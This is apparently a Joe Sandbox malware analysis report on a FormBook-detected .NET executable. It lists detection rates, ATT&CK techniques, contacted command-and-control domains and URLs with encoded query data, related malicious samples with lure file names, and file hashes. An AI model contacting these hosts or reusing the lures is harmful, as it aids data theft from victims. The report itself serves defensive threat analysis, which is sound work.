Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Virtualization/Sandbox Evasion12	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion12	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection612	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information4	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing3	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
UaTmOE6yP9.exe	44%	Virustotal		Browse
UaTmOE6yP9.exe	37%	Metadefender		Browse
UaTmOE6yP9.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
UaTmOE6yP9.exe	100%	Avira	TR/Dropper.Gen
UaTmOE6yP9.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.UaTmOE6yP9.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
productprinting.online	0%	Virustotal	Browse
td-balancer-euw2-6-109.wixdns.net	0%	Virustotal	Browse
behiscalm.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.namebrightstatic.com/images/bg.png)	0%	Avira URL Cloud	safe
http://www.productprinting.online/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ==	0%	Avira URL Cloud	safe
https://www.namebrightstatic.com/images/site_maintenance.png)	0%	Avira URL Cloud	safe
www.simpeltattofor.men/mjyv/	100%	Avira URL Cloud	malware
https://www.namebrightstatic.com/images/logo_off.gif)	0%	Avira URL Cloud	safe
http://www.behiscalm.com/mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3	0%	Avira URL Cloud	safe
http://www.chinatowndeliver.com/mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3	0%	Avira URL Cloud	safe
http://www.jspagnier-graveur.com/mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3	0%	Avira URL Cloud	safe
http://www.corlora.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg==	0%	Avira URL Cloud	safe
http://www.bellaalubo.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw==	0%	Avira URL Cloud	safe
https://www.namebrightstatic.com/images/error_board.png)	0%	Avira URL Cloud	safe
https://www.namebrightstatic.com/images/header_bg.png)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
productprinting.online	108.179.246.105	true	true	0%, Virustotal, Browse	unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	false	0%, Virustotal, Browse	unknown
behiscalm.com	34.102.136.180	true	false	1%, Virustotal, Browse	unknown
chinatowndeliver.com	34.102.136.180	true	false		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
cdl-lb-1356093980.us-east-1.elb.amazonaws.com	54.85.93.188	true	false		high
www.chinatowndeliver.com	unknown	unknown	true		unknown
www.corlora.com	unknown	unknown	true		unknown
www.jspagnier-graveur.com	unknown	unknown	true		unknown
www.thehauntdepot.com	unknown	unknown	true		unknown
www.bellaalubo.com	unknown	unknown	true		unknown
www.behiscalm.com	unknown	unknown	true		unknown
www.productprinting.online	unknown	unknown	true		unknown
www.miyonbuilding.com	unknown	unknown	true		unknown
www.pastlinks.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.productprinting.online/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ==	true	Avira URL Cloud: safe	unknown
www.simpeltattofor.men/mjyv/	true	Avira URL Cloud: malware	low
http://www.behiscalm.com/mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3	false	Avira URL Cloud: safe	unknown
http://www.chinatowndeliver.com/mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3	false	Avira URL Cloud: safe	unknown
http://www.jspagnier-graveur.com/mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3	true	Avira URL Cloud: safe	unknown
http://www.corlora.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg==	true	Avira URL Cloud: safe	unknown
http://www.bellaalubo.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw==	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp	false		high
https://www.namebrightstatic.com/images/bg.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://c.statcounter.com/9484561/0/b0cbab70/1/	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false		high
https://www.namebrightstatic.com/images/site_maintenance.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namebrightstatic.com/images/logo_off.gif)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://statcounter.com/	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false		high
https://www.namebrightstatic.com/images/error_board.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namebrightstatic.com/images/header_bg.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
108.179.246.105	productprinting.online	United States	46606	UNIFIEDLAYER-AS-1US	true
35.246.6.109	td-balancer-euw2-6-109.wixdns.net	United States	15169	GOOGLEUS	false
54.85.93.188	cdl-lb-1356093980.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
34.102.136.180	behiscalm.com	United States	15169	GOOGLEUS	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492896
Start date:	29.09.2021
Start time:	04:37:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	UaTmOE6yP9 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@9/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.9% (good quality ratio 18%) Quality average: 72.8% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.211.4.86, 20.50.102.62 Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54.85.93.188	QUOTATION.exe	Get hash	malicious	Browse	www.bleuexpress.com/c2ue/?p2MH=J8K8iHaOEwQfDdmva6OuDgpCi58OenAq39o1cI0XPr5XOuRBUSPIYOGPFR5DGBu0wMj3v8X2KQ==&GFQ=7nstNj7HDjP876
	truck pictures.exe	Get hash	malicious	Browse	www.tapestrirewards.com/cuig/?9rKPkT=2dfXcPxP_&yTbXp6=rqMojoVU4+Uq2JMOXBh+qMT4A7CXTZvPilNgPjYsWJhfoGCZwdsRhz8WS5UBO4Wo5xtn
	DOC.exe	Get hash	malicious	Browse	www.kanchanaburiclub.com/imm8/?oZBd28E8=dgQ4CeCrSvdlr0wO8gDeYSIVUYIVGFS2JcvD/VIB9WSM9rjznBISObnjhDeypap8IEop&7n6hj=p2MtFfu8w4Y
	REQUEST_PURCHASE_INQUIRY (2).exe	Get hash	malicious	Browse	www.jjkvic.com/im8r/?YdZ=BRR8Rfg8lLYTFV&oP4D7=D2j/KZsjf3nvePcnIuK3h0vppiNFVxsC6H1qkOoKQQ8SKR5XOE/13WfbsLGet6wmNKFP
23.227.38.74	MDM 467574385758 SKTPCC AFRICAGM64635664.exe	Get hash	malicious	Browse	www.werloshop.com/ni8b/?h4L=m2EtCHo26e/nKho8wc405tLWZu08h5d177wDgfP68XcA4eKBSPEe0wV8Hz5GADmxoMby&UR-=4hgT624PnzETpxLP
	BERN210819.exe	Get hash	malicious	Browse	www.reviewallstarscommerce.com/dhua/?D8ChAd=tPVLutthX&1bUt-=8Nyn/XL53QRin4AZYQEJP5jICkJkpUExWXTTV3xx1qwR7gTgTHdZ4XFqaYA2M4MrMHGD
	4zaCyqmOmM.exe	Get hash	malicious	Browse	www.atheanas.com/vngb/?hVoP=6lElp&1bKl2=Do4PgwBHBf9HKdeVzLlVpyHNIKvOXNIqezXIwvRtQPCfB0krrWmytMYEHysMyaefmBqf
	INVOICE.exe	Get hash	malicious	Browse	www.floydsteven.space/avqp/?LVl4iT=JN6HZxgh3h&nVw=vfP5koDqgsgHC9T3oktzzKdNmAAHN1hZxHZKG5Jsk5Rkqo0eIk5dHyW8zQMC4GzToTEz
	68uuwMDMUk.exe	Get hash	malicious	Browse	www.americanrenegadeclothingco.com/hp6s/?t4L=-ZcTJHu&z6Ap=5lwPdUci/GaMlLqZiZifcc1Wx084NG1czI1/YTDNX1Oj8AHYAxOFbvaoDgkZeoGTAQ01
	SecuriteInfo.com.Scr.Malcodegdn30.14006.exe	Get hash	malicious	Browse	www.rocketdealfinder.com/jdt0/?6lHXZ6uH=gtLlkNSDZhnSLx38ddDevTqYs8e8flOlYz5R/lbKzvUDvibK3Uox/lieK7/2psuOIAgV&w2=EtxxATV
	COURT-ORDER#S12GF803_zip.exe	Get hash	malicious	Browse	www.eveyah.com/u86g/?Q8JxYX5=oaIbXD8M2AGRIyF0yJHpQgnh0/Lgzp8U2H3yKCHD9nw1dzOuIuZRR6r/Hd9qAua8Ea2C&pZbH=JJBDHfvx5FFXE42
	DO526.doc	Get hash	malicious	Browse	www.adaiahsboutique.com/fzsg/?7nqHR=ZTwgpJZVmaQ0FtsOKZ8l/DyAMJc4fQOxmUNCITj0wbAekR1xUuffVJmNwmthYiE2kfwcOQ==&Tpg8rN=mvBHQ00X2ZkLDVx
	Orden specifications_pdf.exe	Get hash	malicious	Browse	www.splashstoreofficial.com/dn7r/?Q8=q2MT&eB38=5G3OVyPIhPUtuf3RWdSHaeVrjv6atPLuLZF4jCOkE474QuLFsowMDjjv4lrrwiqwGOcVh9z2uQ==
	DUE PAYMENT.exe	Get hash	malicious	Browse	www.aydeyahouse.com/b2c0/?4hcTrT=mPotD&2dpPwJP=CKOO/2upcFO3xF+FvhJrZ9Hl5SoFLqUlaBpyNgiPLP9ULQmL1ZrDAqpWNLORbc5CJ4Ma
	SBGW#001232021.exe	Get hash	malicious	Browse	www.thesunrisecoffee.com/etaf/?6lttpr=PbbfUgonMl7N60AURdvjCGf5gXHvpP+vqyPFIWnbRFpEJUgyKIximmqLbTlae8shRZeO&JFND6z=_84lfN-p
	678901.exe	Get hash	malicious	Browse	www.newhousebr.com/b2c0/?XXut=DtHTzXpHJvwTW&T0DTobah=tu4FqrlxqkzSIx3U2Rx60Zos9k5v6uCXeSay1AldAEtNuUAzALs+TfOlBEkPyxsGqnb+Aqcnmw==
	purchase_order_list.exe	Get hash	malicious	Browse	www.hypnoticbeauty.net/ou3t/?k2JX=mrSFel4SoltItPYpQlfwEUEgftqMJIfiHJwCVdb3z1XtrBxC8J9onWUKJS9yWCdr+fNL&y2JtQ=Wj6tol
	Order Confirmation.exe	Get hash	malicious	Browse	www.gizmo-zone.com/ccxq/?5jblpb=Q8Gd4NQ&axodBzip=Vo/M3ZToq4SyqR51o7EU0eLDo86QeFvNtT2LIrH5qwSrp1UdTsekIGQ1rbBgSagY5QRq
	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	www.newbeautydk.com/euzn/?kP=4hRhxP&NFNTI8=6sAauxhAWaSEdgx8Bq+0dcztdOu3qC96/cvBc9T5RVr4NmWZka8MmsPmvN3gepCiLv3t
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	www.eletro-laser.com/ny9y/?T2Jp=nnrwyWWjKNFqsz1qgnqP9ulHfQlItzZgm/anvADNP1vHPGlV/LpC2Qgsci0BAIJ4+H9A&SDH8q=KzrTopIpRT
	125M702vaO.exe	Get hash	malicious	Browse	www.youindependents.com/uytf/?7n5LWRVH=4gZWzCQQQof6TfL9TCCSfGm4hewDNvk12R65bFKWIyt/kIoizxJUETagGGtupH8JU+9Ml1F8Mg==&Z4wHXx=3fzDAV28rv
	sprogr.exe	Get hash	malicious	Browse	www.makemoneyfastdieyoung.com/myec/?TBZh=MBNPHfq8ptCTsVBwcciWKfcCglVWGB8DYVq6ygHSWV6Grk4JMsRIAtv0VUi9ld3Face5&-Z68=3fo0sXFHBDotf
	Cota#U00e7#U00e3o de produto.exe	Get hash	malicious	Browse	www.thetrophyworld.com/vd9n/?wTYhn6H=ZtD4MB4lt33J31dxlUKMze/4lIQauaFFKtJrlA0hzJ9l+5i+2kYp7LfxdojqYe+2YTVI&5j3=5jSxuD9xuvQTYnpP
	Payment Proof pdf.exe	Get hash	malicious	Browse	www.lushthingz.com/ssee/?aDHH=53xLUBQPORqA1ypNRBpk7kI+WW7Aobf0anev/F9M5UtU2SwriWPRTdlRE4xzY+8vZdvK&t0G8=DVeTz

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdl-lb-1356093980.us-east-1.elb.amazonaws.com	ejecutable2.exe	Get hash	malicious	Browse	35.168.81.157
	QUOTATION.exe	Get hash	malicious	Browse	54.85.93.188
	truck pictures.exe	Get hash	malicious	Browse	54.85.93.188
	TT Swift Copy.exe	Get hash	malicious	Browse	18.208.31.123
	COAU7229898130.xlsx	Get hash	malicious	Browse	18.208.31.123
	KOC RFQ.doc	Get hash	malicious	Browse	52.204.77.43
	DOC.exe	Get hash	malicious	Browse	54.85.93.188
	SOA.exe	Get hash	malicious	Browse	23.20.208.181
	REQUEST_PURCHASE_INQUIRY (2).exe	Get hash	malicious	Browse	54.85.93.188
	Y0GEeY1WOWNMYni.exe	Get hash	malicious	Browse	52.205.158.209
	PVCbiDUqly50DqS.exe	Get hash	malicious	Browse	52.205.158.209
	Inquiry.exe	Get hash	malicious	Browse	52.205.158.209
	Order_confirmation_ SMKT 09062021_.exe	Get hash	malicious	Browse	18.208.31.123
	PO9887655.exe	Get hash	malicious	Browse	18.208.31.123
	nFzJnfmTNh.exe	Get hash	malicious	Browse	52.7.227.88
	catalogo campione_0021.exe	Get hash	malicious	Browse	52.7.227.88
	0039234_00533MXS2.exe	Get hash	malicious	Browse	52.7.227.88
	Unpaid Invoice.exe	Get hash	malicious	Browse	23.20.208.181
	SOA.exe	Get hash	malicious	Browse	52.21.182.71
	Remmittance Advise.exe	Get hash	malicious	Browse	67.202.20.60
shops.myshopify.com	MDM 467574385758 SKTPCC AFRICAGM64635664.exe	Get hash	malicious	Browse	23.227.38.74
	BERN210819.exe	Get hash	malicious	Browse	23.227.38.74
	4zaCyqmOmM.exe	Get hash	malicious	Browse	23.227.38.74
	INVOICE.exe	Get hash	malicious	Browse	23.227.38.74
	68uuwMDMUk.exe	Get hash	malicious	Browse	23.227.38.74
	SecuriteInfo.com.Scr.Malcodegdn30.14006.exe	Get hash	malicious	Browse	23.227.38.74
	DHL AWB# 4AB19037XXX.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	COURT-ORDER#S12GF803_zip.exe	Get hash	malicious	Browse	23.227.38.74
	DO526.doc	Get hash	malicious	Browse	23.227.38.74
	Orden specifications_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	DUE PAYMENT.exe	Get hash	malicious	Browse	23.227.38.74
	SBGW#001232021.exe	Get hash	malicious	Browse	23.227.38.74
	678901.exe	Get hash	malicious	Browse	23.227.38.74
	purchase_order_list.exe	Get hash	malicious	Browse	23.227.38.74
	Order Confirmation.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	Quotation & Sample Designs.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	125M702vaO.exe	Get hash	malicious	Browse	23.227.38.74
	sprogr.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	BhVQ8rqxTUy5ijy.exe	Get hash	malicious	Browse	50.87.249.32
	RpcNs4.exe	Get hash	malicious	Browse	50.116.78.109
	Document_.exe	Get hash	malicious	Browse	162.241.123.16
	Original-BL Copy.exe	Get hash	malicious	Browse	192.254.224.94
	nuovo ordine. 908272762.exe	Get hash	malicious	Browse	216.172.170.84
	Import Custom Duty invoice.doc	Get hash	malicious	Browse	192.185.171.144
	PRICE ENQUIRY.exe	Get hash	malicious	Browse	192.185.108.208
	vNBfeEsb8L.doc	Get hash	malicious	Browse	108.167.172.125
	SURRENDERED HBL COPY IJKTF0425LAX.exe	Get hash	malicious	Browse	192.254.180.165
	VQnw7E91Ce.exe	Get hash	malicious	Browse	192.185.171.144
	PO-34482.exe	Get hash	malicious	Browse	162.215.209.83
	Original-BL Copy.exe	Get hash	malicious	Browse	192.254.224.94
	Order778.exe	Get hash	malicious	Browse	162.241.69.84
	ATKtxrOZ8V.dll	Get hash	malicious	Browse	192.185.115.199
	H4lKd1Y7t2.exe	Get hash	malicious	Browse	50.116.87.224
	Un77J3HEmD.exe	Get hash	malicious	Browse	162.214.65.211
	Purchase Order CTPO18542#.exe	Get hash	malicious	Browse	162.215.209.83
	Document Delivery 28-09-21pdf.exe	Get hash	malicious	Browse	162.215.209.83
	waffle_lol.xls	Get hash	malicious	Browse	192.185.143.195
	waffle_lol.xls	Get hash	malicious	Browse	192.185.143.195
AMAZON-AESUS	arm7	Get hash	malicious	Browse	44.210.72.107
	arm	Get hash	malicious	Browse	54.46.149.179
	e7J5EyDu6K.exe	Get hash	malicious	Browse	50.17.5.224
	CVbJSUXraQ.exe	Get hash	malicious	Browse	50.17.5.224
	PUBcvjKo0Q.exe	Get hash	malicious	Browse	50.17.5.224
	GnLUfsKnVw.exe	Get hash	malicious	Browse	50.17.5.224
	0y2RAtxkw2.exe	Get hash	malicious	Browse	50.17.5.224
	Doc (BL, inv & packing list).exe	Get hash	malicious	Browse	3.223.115.185
	BERN210819.exe	Get hash	malicious	Browse	3.223.115.185
	iRv.exe	Get hash	malicious	Browse	3.223.115.185
	INVOICE.exe	Get hash	malicious	Browse	54.85.86.211
	7ivFMbol8b.exe	Get hash	malicious	Browse	3.209.36.65
	QNz520BQoI.exe	Get hash	malicious	Browse	50.17.5.224
	uO07mrb8IU.exe	Get hash	malicious	Browse	50.17.5.224
	oE2WZvR190.exe	Get hash	malicious	Browse	50.17.5.224
	6BaSb467zW.exe	Get hash	malicious	Browse	50.17.5.224
	Order778.exe	Get hash	malicious	Browse	3.223.115.185
	H4lKd1Y7t2.exe	Get hash	malicious	Browse	23.21.157.88
	vg7OaNVgqD.exe	Get hash	malicious	Browse	52.20.84.62
	DN02468001.exe	Get hash	malicious	Browse	50.17.5.224

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	2.7434162724793136
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	UaTmOE6yP9.exe
File size:	1048576
MD5:	4c70d5b1c63a468f7e0aedf64f93ca42
SHA1:	c248ab00560786b7be23151597d9503a2e84602f
SHA256:	83242a0f42be34e66e502e4a3a45d2470f3b24aef8a1d8484711f4439d7fe74a
SHA512:	2146f98b4f950555333a00668ab6f71ad2a432b12d12cb0c07cc2dc342884f88b491442c84da763b3101ee7ac89e8c08f6552203ba9470401e934191e4858a8c
SSDEEP:	3072:EWrIy8kmoEBZBB2lrEtC1JZdDFs3sb5fkaLZ2sf2h8yezeci6x46xXX07/Bg9s9L:N/ZzLfkuS8yADi6vxU7/w8+PsFT8lw
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^Na.................v............... ........@.. ..............................<.....@................................

File Icon


Icon Hash:	72d2d2dadadad2d2

Static PE Info

General
Entrypoint:	0x4395ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614E5E8D [Fri Sep 24 23:26:05 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
